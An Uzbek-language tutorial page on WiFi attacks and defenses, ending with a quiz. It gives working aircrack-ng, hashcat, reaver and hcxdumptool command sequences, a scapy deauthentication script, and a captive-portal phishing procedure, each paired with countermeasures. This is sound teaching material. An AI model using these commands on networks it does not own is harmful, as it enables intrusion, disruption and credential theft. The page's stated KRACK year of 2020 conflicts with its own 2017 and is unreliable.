WiFi Hujumlari

Simsiz tarmoqlarga qarshi hujum va himoya usullari

WiFi tarmoqlari ubiquitous bo'lib qolgan bugungi kunda simsiz hujumlar tobora ko'paymoqda. WEP kriptografiyasining buzilishidan tortib, zamonaviy WPA3 protokoliga qarshi hujumlargacha — simsiz xavfsizlik muhim ahamiyat kasb etadi. Ushbu bo'limda WiFi protokollarining zaifliklari, hujum metodologiyasi va eng yaxshi himoya amaliyotlari ko'rib chiqiladi.

43%
Ochiq WiFi dan foydalanuvchilar
2020
KRACK hujumi yili
WPA3
Zamonaviy standart
AES-256
Eng xavfsiz shifrlash

WiFi Xavfsizlik Protokollari Evolyutsiyasi

WEP 1999 Juda zaif! RC4 shifrlash Aircrack bilan minutlarda buziladi ❌ ISHLATMANG! WPA 2003 Zaifliklari bor TKIP shifrlash WEP'dan yaxshi Wordlist hujumi ⚠️ Eskirgan WPA2 2004 Keng tarqalgan AES-CCMP PMKID hujumi KRACK zaiflik ⚡ Hali keng ishlatiladi WPA3 2018 Eng xavfsiz SAE handshake Forward secrecy 192-bit shifrlash ✅ Tavsiya etiladi

1. Evil Twin / Rogue Access Point

Evil Twin hujumida tajovuzkor qonuniy WiFi tarmog'ini taqlid qiluvchi soxta access point yaratadi. Qurbonlar soxta tarmoqqa ulanganda barcha trafikni tajovuzkor ko'rishi mumkin. Kafeler, aeroportlar va mehmonxonalar bu hujum uchun eng qulay joylar hisoblanadi.

Hujum jarayoni:
1
Qonuniy AP ni aniqlash

airodump-ng bilan "CoffeeShop_WiFi" SSID topiladi

2
Soxta AP yaratish

Xuddi shu SSID bilan kuchliroq signal orqali AP yaratiladi

3
Deauth hujumi

Qonuniy AP ga qarshi deauth paketlari yuborib, foydalanuvchilar ulanishi uziladi

4
MITM pozitsiyasi

Qurbonlar soxta AP ga ulansa, barcha trafik tajovuzkor orqali o'tadi

Airbase-ng bilan demonstratsiya (CTF uchun):
# Monitor rejimiga o'tish
airmon-ng start wlan0

# Mavjud AP larni skanerlash
airodump-ng wlan0mon

# Soxta AP yaratish (SSID bilan)
airbase-ng -e "CoffeeShop_WiFi" \
           -c 6 wlan0mon

# Deauth hujumi (qonuniy AP ga)
aireplay-ng --deauth 0 \
            -a  wlan0mon

# Hostapd bilan murakkab AP
# hostapd.conf faylida sozlash:
# ssid=FreeWifi
# wpa=0  (ochiq tarmoq)

Faqat o'z tarmog'ingizda yoki ruxsat berilgan muhitda ishlating!

Himoya:
  • Ochiq WiFi da VPN ishlating
  • HTTPS Only saytlarga kiring
  • WiFi avtomatik ulanishni o'chiring
  • Sertifikat ogohlantirishlariga e'tibor bering
  • 802.11w (Management Frame Protection)
  • WPA3-SAE ishlatish

2. WPA/WPA2 Handshake Capture va Cracking

WPA2 da foydalanuvchi ulanganda 4-way handshake almashinuvi amalga oshiriladi. Bu handshake ushlanib, offline brute-force bilan parol topilishi mumkin. Parol kuchsiz bo'lsa, bu hujum muvaffaqiyatli bo'ladi.

4-Way Handshake jarayoni:
Access Point Mijoz M1: ANonce M2: SNonce + MIC M3: GTK + MIC M4: ACK ↑ Bu paketlar ushlanib cracklanishi mumkin!
Handshake ushlash va crack:
# 1. Monitor mode
airmon-ng start wlan0

# 2. Tarmoqlarni skanerlash
airodump-ng wlan0mon

# 3. Target AP skanerlash + cap fayl
airodump-ng -c 6 \
  --bssid AA:BB:CC:DD:EE:FF \
  -w /tmp/capture wlan0mon

# 4. Deauth (handshake uchun)
aireplay-ng --deauth 5 \
  -a AA:BB:CC:DD:EE:FF wlan0mon

# 5. Parol cracking - hashcat
hashcat -m 22000 capture.hc22000 \
  rockyou.txt

# 6. John the Ripper bilan
hccap2john capture.cap > hash.txt
john hash.txt --wordlist=rockyou.txt
PMKID hujumi (2018, yangi usul):

Clientless — foydalanuvchi ulangan bo'lmasa ham ishlaydi!

# hcxdumptool bilan
hcxdumptool -o dump.pcapng \
  -i wlan0mon --enable_status=3

# PMKID ajratish
hcxpcaptool -z hash.txt dump.pcapng

# Cracking
hashcat -m 22000 hash.txt wordlist.txt
Himoya:
  • Kuchli parol: 12+ belgi, aralash (harf+raqam+belgi)
  • WPA3 SAE: offline cracking imkonini yo'q qiladi
  • 802.1X / Enterprise: har bir foydalanuvchiga alohida autentifikatsiya
  • Passphrase ning dictionary'da bo'lmasligini tekshiring

3. Deauthentication Hujumi (WiFi DoS)

WiFi 802.11 standartida Management Frame lar himoyalanmagan. Tajovuzkor soxta deauth paketlari yuborib, foydalanuvchilarni tarmoqdan uzib tashlashi mumkin. Bu Evil Twin hujumining ajralmas qismi hamdir.

# Barcha clientlarni uzib tashlash
aireplay-ng --deauth 0 \
  -a  wlan0mon

# Bitta clientni uzish
aireplay-ng --deauth 10 \
  -a  \
  -c  wlan0mon

# mdk4 bilan keng hujum
mdk4 wlan0mon d -b blacklist.txt

# scapy bilan Python script
from scapy.all import *
dot11 = Dot11(addr1="ff:ff:ff:ff:ff:ff",
              addr2="aa:bb:cc:dd:ee:ff",
              addr3="aa:bb:cc:dd:ee:ff")
frame = RadioTap()/dot11/Dot11Deauth(reason=7)
sendp(frame, iface="wlan0mon", count=100)
Himoya (802.11w - PMF):
# Hostapd konfiguratsiyasida PMF yoqish
# /etc/hostapd/hostapd.conf

ieee80211w=2          # Majburiy
# 0 = O'chirilgan
# 1 = Ixtiyoriy
# 2 = Majburiy

# WPA3 da PMF avtomatik majburiy

# Cisco AP konfiguratsiyasi
wlan security pmf required

# Router sozlamalarida:
# "Management Frame Protection" = Required

802.11w (PMF) — Management Frame Protection. Deauth paketlarini kriptografik imzolash orqali soxta paketlarni bloklaydi. WPA3 da majburiy.

4. WEP Cracking

WEP (1999) RC4 shifrlashidan foydalanadi va IV (Initialization Vector) zaifligiga ega. Aircrack-ng bilan 5000 paket yig'ib, bir necha minutda buziladigan standart.

# WEP hujumi - aircrack-ng suite
airmon-ng start wlan0
airodump-ng -c 6 --bssid  \
  -w wep_cap wlan0mon

# ARP Replay (tezlashtirilgan)
aireplay-ng --arpreplay \
  -b  wlan0mon

# 25000+ paket yig'ilganda
aircrack-ng wep_cap*.cap
# Natija: KEY FOUND! [ 1A:2B:3C:4D:5E ]

WEP hali ishlatilmoqdami?

2024-yil ma'lumotiga ko'ra, dunyo bo'yicha hali 3% tarmoq WEP ishlatmoqda. Bu jiddiy xavfsizlik muammosi.

5. KRACK Hujumi (WPA2)

KRACK (Key Reinstallation Attack) — 2017-yil Mathy Vanhoef tomonidan kashf etilgan WPA2 zaiflik. 4-way handshake da nonce qayta ishlatilishi orqali shifrlangan trafikni ochish mumkin.

CVE-2017-13077 / 13080

Android va Linux qurilmalar ayniqsa zaif edi. All-zero encryption key reinstallation mumkin edi.

Ta'sirlangan qurilmalar:

Android 6+, macOS, Linux, Windows — deyarli barcha WPA2 qurilmalar ta'sirlangan edi.

Himoya: OS yangilanishi

2017-yil oktyabr — barcha asosiy OS lar patch chiqardi. WPA3 bu zaiflikni butunlay hal qildi.

6. Captive Portal va KARMA Hujumi

Captive Portal hujumida tajovuzkor soxta WiFi tarmoq yaratibi, ulanishdan keyin login sahifasi ko'rsatadi va foydalanuvchidan credentials so'raydi. KARMA hujumida esa qurilmaning "avval ulangan tarmoqlar" ro'yxatidan foydalanib, avtomatik ulanish qo'lga olinadi.

Captive Portal Hujumi:
  1. 1. Mashhur SSID bilan ochiq AP yaratish
  2. 2. Barcha trafikni 192.168.1.1 ga yo'naltirish
  3. 3. Soxta login sahifasi (Facebook, Google, bank)
  4. 4. Qurbon parol kiritganda ushlab qolish
  5. 5. Haqiqiy saytga yo'naltirish (shubha yo'q)

hostapd-wpe va wifiphisher framework'lari bu hujumni avtomatlashtiradi.

KARMA Hujumi:
# Qurilmaning Probe Request
# -------------------------------------------
# Telefon: "FreeAirport_WiFi" bormi?
# KARMA AP: "Ha, men FreeAirport_WiFi man!"
# Telefon: (avtomatik ulanadi)

# Hostapd KARMA rejimi
# hostapd-karma.conf:
# karma=1  # Har qanday SSID ga javob

# hcxtools bilan:
hcxdumptool -i wlan0mon \
  --enable_status=15
Himoya:
  • • Eskilgan WiFi profillarini o'chiring
  • • WiFi "Auto-join" ni o'chiring
  • • Ochiq WiFi da VPN majburiy

7. WPS PIN Brute-Force (Reaver)

WPS (Wi-Fi Protected Setup) 8 xonali PIN tizimi dizayn bo'yicha zaif. PIN 2 qismga bo'linib tekshirilishi sababli, 11,000 ta urinish bilan butunlay buziladie (2011, Stefan Viehbock).

# WPS yoqilgan AP lar
wash -i wlan0mon

# Reaver bilan PIN brute-force
reaver -i wlan0mon \
  -b  \
  -vv \
  --no-associate

# Pixie Dust hujumi (tezroq)
# Ba'zi routerlarda pseudo-random seed
reaver -i wlan0mon \
  -b  \
  -vv \
  -K 1  # Pixie Dust mode

# Bully bilan alternativa
bully wlan0mon \
  -b  \
  -d -v 3
WPS Zaifligining Matematikasi:
8 xonali PIN = 10⁸ = 100,000,000 kombinatsiya
Lekin oxirgi xona checksum, demak aslida 7 xona.
Va ikkiga bo'linib tekshiriladi: birinchi 4: 10⁴ = 10,000, ikkinchi 3: 10³ = 1,000
11,000 ta urinish = butun WPS buziladi!
Himoya:
  • Routerda WPS ni O'CHIRING
  • WPS Lock-out (10 xato keyin bloklash)

WiFi Xavfsizlik Standartlari Taqqoslash

Protokol Yil Shifrlash Asosiy Zaiflik Holat
WEP 1999 RC4 (40/104 bit) IV collision, aircrack ❌ Eskirgan
WPA 2003 TKIP (128 bit) TKIP zaiflik, wordlist ⚠️ Eskirgan
WPA2-Personal 2004 AES-CCMP (128 bit) KRACK, PMKID, zaif parol ⚡ Keng tarqalgan
WPA2-Enterprise 2004 AES-CCMP + 802.1X RADIUS server zaiflik ✅ Korporativ uchun
WPA3-Personal 2018 SAE (192 bit) Dragonblood (2019, tuzatildi) ✅ Tavsiya etiladi
WPA3-Enterprise 2018 AES-256-GCMP + 802.1X Noma'lum jiddiy zaiflik ✅ Eng xavfsiz

Bilimingizni Sinang

1. WPS PIN hujumida nechta maksimal urinish kerak?

  • A) 100,000,000
  • B) 11,000 ✓ — PIN ikkiga bo'linib tekshiriladi
  • C) 10,000,000
  • D) 1,000

2. KRACK hujumi qaysi WiFi protokolga qarshi?

  • A) WEP
  • B) WPA
  • C) WPA2 ✓ — 4-way handshake nonce reinstallation
  • D) WPA3

3. Deauthentication hujumidan himoya qiluvchi 802.11 standart qo'shimchasi qaysi?

  • A) 802.11n
  • B) 802.11ac
  • C) 802.11w (PMF) ✓ — Management Frame Protection
  • D) 802.11ax